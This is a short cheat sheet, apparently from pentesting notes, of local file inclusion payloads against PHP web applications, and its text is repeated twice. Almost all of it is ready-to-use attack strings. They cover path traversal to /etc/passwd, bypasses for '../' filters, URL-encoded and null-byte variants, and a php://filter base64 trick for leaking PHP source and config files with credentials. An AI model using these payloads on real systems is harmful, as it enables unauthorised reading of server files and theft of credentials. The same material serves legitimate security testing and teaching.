LFI

LFI techniques

Basic LFI

Basic: /index.php?path=/etc/passwd
Path traversal: /index.php?path=../../../../etc/passwd
Name prefix (like /etc/our_input): /index.php?path=/../../../etc/passwd
Approved Path (If the webserver errors if you don't go to some directory above first): /index.php?path=./directories_above/../../../../etc/passwd

More advanced LFI

Nonrecursive ../ filter: /index.php?path=....//....//....//....//etc/passwd
URL encode payload: /index.php?path=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
If the webserver appends .php to our input
- Using null byte to make string end (obsolete): /index.php?path=../../../../etc/passwd%00
- Read php files (maybe some source code to login or config file that has credentials):
  1. /index.php?path=php://filter/read=convert.base64-encode/resource=webconfig (webconfig turns into webconfig.php)
  2. Take ALL of the base64 that is shown on the page and echo "base64" | base64 -d

Last updated 2 years ago

LFI techniques

Basic LFI

Basic: /index.php?path=/etc/passwd
Path traversal: /index.php?path=../../../../etc/passwd
Name prefix (like /etc/our_input): /index.php?path=/../../../etc/passwd
Approved Path (If the webserver errors if you don't go to some directory above first): /index.php?path=./directories_above/../../../../etc/passwd

More advanced LFI

Nonrecursive ../ filter: /index.php?path=....//....//....//....//etc/passwd
URL encode payload: /index.php?path=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
If the webserver appends .php to our input
- Using null byte to make string end (obsolete): /index.php?path=../../../../etc/passwd%00
- Read php files (maybe some source code to login or config file that has credentials):
  1. /index.php?path=php://filter/read=convert.base64-encode/resource=webconfig (webconfig turns into webconfig.php)
  2. Take ALL of the base64 that is shown on the page and echo "base64" | base64 -d

Last updated 2 years ago